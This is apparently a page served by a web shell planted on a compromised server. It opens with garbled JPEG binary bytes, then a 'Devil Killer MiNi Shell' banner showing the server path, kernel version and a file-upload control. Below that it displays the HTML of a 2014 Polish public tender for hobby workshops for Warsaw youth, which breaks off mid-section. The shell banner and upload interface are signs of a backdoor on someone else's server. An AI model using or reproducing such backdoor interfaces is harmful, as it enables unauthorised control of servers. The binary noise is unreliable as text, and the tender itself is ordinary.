JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141014/340840-N-2014.html

<p class="kh_header"><b>Warszawa: organizacja i przeprowadzenie kursów/warsztatów hobbystycznych dla młodzieży biorącej udział w projekcie Aktywny Targówek współfinansowanym ze środków Europejskiego Funduszu Społecznego w podziale na 11 części</b><br>
<b>Numer ogłoszenia: 340840 - 2014; data zamieszczenia: 14.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Dzielnicy Targówek miasta stołecznego Warszawy , ul. Św. Wincentego 87, 03-291 Warszawa, woj. mazowieckie, tel. 22 277 02 50, faks 22 370 25 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops-targowek.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> organizacja i przeprowadzenie kursów/warsztatów hobbystycznych dla młodzieży biorącej udział w projekcie Aktywny Targówek współfinansowanym ze środków Europejskiego Funduszu Społecznego w podziale na 11 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Przeprowadzenie 11 rodzajów kursów/warsztatów hobbystycznych dla młodzieży biorącej udział w projekcie Aktywny Targówek realizowanego w ramach Programu Operacyjnego Kapitał Ludzki finansowanym ze środków Europejskiego Funduszu Społecznego. 
Kod CPV -ogólny 80.50.00.00-9- usługi szkoleniowe
80.52.10.00-2 usługi opracowywania programów szkoleniowych
Zamawiający dopuszcza możliwość składania ofert częściowych. Łączna ilość części zamówienia wynosi 11. Każdy z Wykonawców może złożyć ofertę na dowolną ilość części.
Zamówienie dotyczy następujących kursów zawodowych:

1.	Podstawowy kurs wizażu i stylizacji dla amatorów dla 11 osób.
2.	 Warsztaty Zumby dla 5 osób.
3.	Kuchnia włoska- gotowanie moje hobby dla 9 osób.
4.	Warsztat przygotowania sushi (podstawowy)  dla 8 osób.
5.	Warsztat samoobrony dla młodzieży dla 9 osób.
6.	Kurs szybkiego uczenia się i zapamiętywania dla 7 osób.
7.	Kurs przedłużania i zagęszczania rzęs dla 9 osób.
8.	Kurs przedłużania włosów dla 11 osób.
9.	Kurs manicure i pedicure dla 10 osób.
10.	Kurs masażu dla amatorów dla 10 osób.
11.	Warsztat zdrowego żywienia z dietetyką  dla 5 osób.
 Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do niniejszej Specyfikacji Istotnych Warunków Zamówienia. Zamawiający wymaga od Wykonawców przed złożeniem oferty dokładnego zapoznania się z opisem przedmiotu zamówienia, oraz z zapisami wzoru umowy stanowiącego załącznik nr 7 do niniejszej SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do 50% wartości zamówienia podstawowego, polegających na powtórzeniu tych samych zadań w przypadku, jeżeli zamówiona ilość okaże się niewystarczająca lub jeżeli zaistnieje konieczność skierowania do udziału większej ilości uczestników i/lub jeżeli w okresie następnych trzech lat od podpisania umowy koniecznym okaże się nabycie usług tożsamych z przedmiotem zamówienia, na przykład w ramach kolejnych projektów EFS i/lub w ramach podstawowej działalności Zamawiającego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.52.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy z art. 22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy z art. 22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lokalem w Warszawie przystosowanym do przeprowadzenia kursu/kursów, wyposażonym odpowiednio do realizacji zamówienia będącego przedmiotem postępowania oraz zapewni do realizacji zadania osoby posiadające kwalifikacje do przeprowadzenia kursu. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (załącznik do SIWZ). W części 2,5,6 sale zapewnia Zamawiający.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lokalem w Warszawie przystosowanym do przeprowadzenia kursu/kursów, wyposażonym odpowiednio do realizacji zamówienia będącego przedmiotem postępowania oraz zapewni do realizacji zadania osoby posiadające kwalifikacje do przeprowadzenia kursu. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (załącznik nr SIWZ). W części 2,5,6 sale zapewnia Zamawiający.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy z art. 22 ust.1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień zawartej umowy
Zamawiający dopuszcza do zmiany postanowień umowy w przypadku:
1.	Nazwy, adresu oraz osób reprezentujących strony;
2.	Każdej zmiany, która jest korzystna lub neutralna dla Zamawiającego, lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego;
3.	terminów i miejsca, o których mowa w załączniku nr 7 par.1
4.	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
5.	z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops-targowek.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej Dzielnicy Targówek m. st. Warszawy, ul. Św. Wincentego 87, 03-291 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2014 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej Dzielnicy Targówek m. st. Warszawy, ul. Św. Wincentego 87, 03-291 Warszawa, piętro I sekretariat, pok. nr 24.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Aktywny Targówek, Europejski Fundusz Społeczny, Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Podstawowy kurs wizażu i stylizacji dla amatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Celem kursu jest przybliżenie podstawowych zagadnień związanych z makijażem, modą i stylem. Uczestnikami będą amatorzy pragnący poprawić swój wizerunek dzięki poradom stylistów i nabyciu umiejętności doboru kosmetyków, rodzajów makijażu i strojów w zależności od typu urody, kolorystyki i figury oraz  sytuacji. Kurs ma rozbudzić kreatywność uczestników i pobudzić ich chęć dbania o siebie;
2.	W szkoleniu weźmie udział  11 osób - młodzież biorąca udział w Projekcie Aktywny Targówek, w podziale na  2 grupy;
3.	Czas trwania kursu dla każdej grupy: 2 dni szkolenia po 8 godzin. Łącznie 16 godzin lekcyjnych, w tym przynajmniej 13 godzin zajęć praktycznych dla każdej grupy czyli w sumie 32 godziny (dla 2 grup);
4.	Szkolenie odbędzie się w soboty i w niedziele;
5.	Wykonawca zapewnieni salę wyposażoną  w stanowiska i profesjonalne akcesoria do wykonania makijażu  oraz stylizacji  dla każdego uczestnika kursu, tj. przynajmniej w 6 stanowisk (1 grupa); 
6.	Wykonawca zapewni dla uczestników serwis kawowy (kawa, herbata, ciasteczka) oraz 1 posiłek obiadowy dziennie;
7.	W ramach kursu Wykonawca zrobi sesję zdjęciową, która będzie obrazowała przemiany-metamorfozy uczestników na skutek stylizacji, powieli sesję na płytach w ilości sztuk tożsamej z ilością uczestników oraz rozda uczestnikom w formie dodatkowego materiału. Wykonawca 1 egzemplarz płyty załączy do raportu poszkoleniowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warsztaty Zumby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia  jest usługa polegająca na przeprowadzeniu  warsztatów zumby dla 5 osób - młodzieży  biorącej udział w Projekcie Aktywny Targówek;
2. Celem kursu jest nauczenie podstawowych kroków zumby i zachęcenie młodzieży do takiej formy aktywnego spędzania czasu. Kurs ma rozbudzić chęć aktywnego spędzania czasu uczestników;
3. Czas trwania warsztatów: nie mniej niż 16 godzin lekcyjnych. Warsztaty powinny odbyć się w nasileniu 1 lub 2 razy w tygodniu -w zależności od ustaleń z grupą- x 2 godziny lekcyjne w dni powszednie, w godzinach popołudniowych -zajęcia mogą zacząć się nie wcześniej niż od godziny 15.00;
4. Warsztaty odbędą się na terenie Zespołu Szkół przy ul. Mieszka I 7;
5. Zamawiający zapewni salę do zajęć a Wykonawca zapewni muzykę i jej nagłośnienie;
6.  Wykonawca zapewni dla uczestników warsztatów wodę mineralną -minimum 1 x 0,5 litra na osobę, na każdych zajęciach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> kuchnia włoska- gotowanie moje hobby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu szkolenia  w formie warsztatów na temat kuchni włoskiej;
2.	Celem warsztatów jest zaprezentowanie popularnych dań kuchni włoskiej, połączone z zajęciami praktycznymi, polegającymi na wspólnym gotowaniu popularnych dań kuchni włoskiej. Uczestnicy mają gotować dania pod opieką kucharza wyspecjalizowanego w przygotowaniu dań kuchni włoskiej. Dodatkowym celem warsztatów jest wytworzenie i pogłębienie hobbystycznych zainteresowań młodzieży kulturą i kuchnią różnych regionów świata oraz nauka współpracy zespołowej przy podejmowaniu takich czynności, jak wspólne przygotowanie potraw;
3.	Uczestnikami warsztatu będzie 9 osób - młodzież biorąca udział w Projekcie Aktywny Targówek;
4.	Czas trwania  warsztatów: nie mniej niż 4 godziny (wraz z degustacją). Warsztaty  będą odbywać się w dni powszednie, po godzinie 16.00. Szczegółowy termin warsztatów zostanie uzgodniony z Zamawiającym;
5.  Wykonawca,  poza wymaganiami określonymi w części ogólnej Opisu przedmiotu zamówienia, w cenie i programie  warsztatów  musi uwzględnić:
- przeprowadzenie warsztatów kulinarnych z degustacją  trwających co najmniej 4 godziny;
- zaprezentowanie kuchni włoskiej i zachęcenie młodzieży do traktowania gotowania jako ciekawego hobby;
 - praktyczną naukę wspólnego przygotowywania co najmniej 4 potraw;
 - zapewnienie sali wyposażonej w odpowiednią ilość stanowisk oraz niezbędny sprzęt;
 - produkty do przyrządzania potraw w ramach zajęć praktycznych;
 - degustację przyrządzonych potraw oraz zapewnienie napojów: woda mineralna, soki;
 - zapewnienie zabezpieczenia ubrań uczestników np. fartuchy, zapaski, itp.;
 - materiał w postaci wydrukowanych przepisów kulinarnych dla każdego uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warsztat przygotowania sushi (podstawowy).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Celem warsztatu jest zapoznanie uczestników z tajnikami kuchni japońskiej w zakresie podstawowego przygotowywania sushi. Warsztat musi być połączony z praktyką i degustacją;
2.	Uczestnikami warsztatu będzie 8 osób - młodzież biorąca udział w Projekcie Aktywny Targówek;
3.	Czas trwania  warsztatów: nie mniej niż 4 godziny (wraz z degustacją). Warsztaty  będą odbywać się w dni powszednie, zajęcia rozpoczną się po godzinie 16.00. Szczegółowy termin warsztatów zostanie uzgodniony z Zamawiającym;
4.	Program  kursu musi zawierać:
Zasady japońskiej sztuki kulinarnej, historie sushi, omówienie składników stosowanych do przygotowania sushi oraz ćwiczenia praktyczne:
  -Przygotowanie surowców (sprawianie i krojenie ryb i owoców morza, krojenie warzyw);
  - Przygotowanie składników przetworzonych (gotowanie ryżu, sporządzenie zaprawy, zaprawianie ryżu, smażenie omleta tamago);
  - Pokaz przygotowywania sushi: nigiri, hosomaki, futomaki, uramaki, chirasi;
  - Trening uczestników, samodzielne przygotowanie poszczególnych form;
  - Komponowanie zestawów sushi;
  - Dobre maniery przy japońskim stole;
  -  Degustacja
5. Wykonawca, poza wymaganiami określonymi w części ogólnej Opisu przedmiotu zamówienia, w cenie i programie warsztatów musi uwzględnić:
- przeprowadzenie warsztatów kulinarnych z degustacją  trwających co najmniej 4 
godziny;
- zachęcenie młodzieży do traktowania gotowania jako ciekawego hobby;
 - praktyczną naukę wspólnego przygotowywania sushi;
 - zapewnienie sali wyposażonej w odpowiednią ilość stanowisk oraz niezbędny sprzęt;
 - produkty do przyrządzania potraw w ramach zajęć praktycznych;
 - degustację przyrządzonych potraw oraz zapewnienie napojów: woda mineralna, soki;
 - zapewnienie zabezpieczenia ubrań uczestników np.  fartuchy, zapaski, itp.;
 - materiał w postaci wydrukowanych przepisów  kulinarnych dla każdego uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warsztat samoobrony dla młodzieży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu warsztatów z samoobrony dla 9 osób -młodzieży biorącej udział w Projekcie Aktywny Targówek;
2.	Celem warsztatów będzie nabycie umiejętności zachowania się w sytuacjach zagrożenia, poznanie podstawowych technik samoobrony, podniesienie poczucia bezpieczeństwa oraz nauka pozytywnych i skutecznych zachowań społecznych;
3.	Czas trwania kursu:12 godzin lekcyjnych. Warsztat odbędzie się w sobotę lub niedzielę (2 dni * 6 godzin lekcyjnych);
4.	Warsztaty odbędą się na terenie Zespołu Szkół przy ul. Mieszka I 7;
5.	Zamawiający zapewni salę do zajęć a Wykonawca zapewni wszelkie niezbędne do warsztatów pomoce;
6.	Wykonawca zapewni dla uczestników warsztatów wodę mineralną, soki oraz ciasteczka a także naczynia do ich dystrybucji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> kurs szybkiego uczenia się i zapamietywania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu Kursu szybkiego uczenia się i zapamiętywania dla 7 osób -młodzieży biorącej udział w Projekcie Aktywny Targówek;
2.	Celem kursu będzie dostarczenie praktycznej wiedzy o metodach uczenia się, rozwijania, myślenia, koncentracji uwagi, szybkiego zapamiętywania i efektywnego czytania. Kurs musi odbywać się w formie ćwiczeń praktycznych;
3.	Czas trwania kursu: 9  godzin  lekcyjnych. Szkolenie odbędzie się w godzinach popołudniowych (zajęcia zaczną się od 14.00 - 15.00) i potrwa przed 3 popołudnia po 3 godziny lekcyjne.;
4.	Kurs odbędzie się na terenie Zespołu Szkół przy ul. Mieszka I 7;
5.	Zamawiający zapewni salę do zajęć a Wykonawca zapewni wszelkie niezbędne do pomoce do przeprowadzenia kursu;
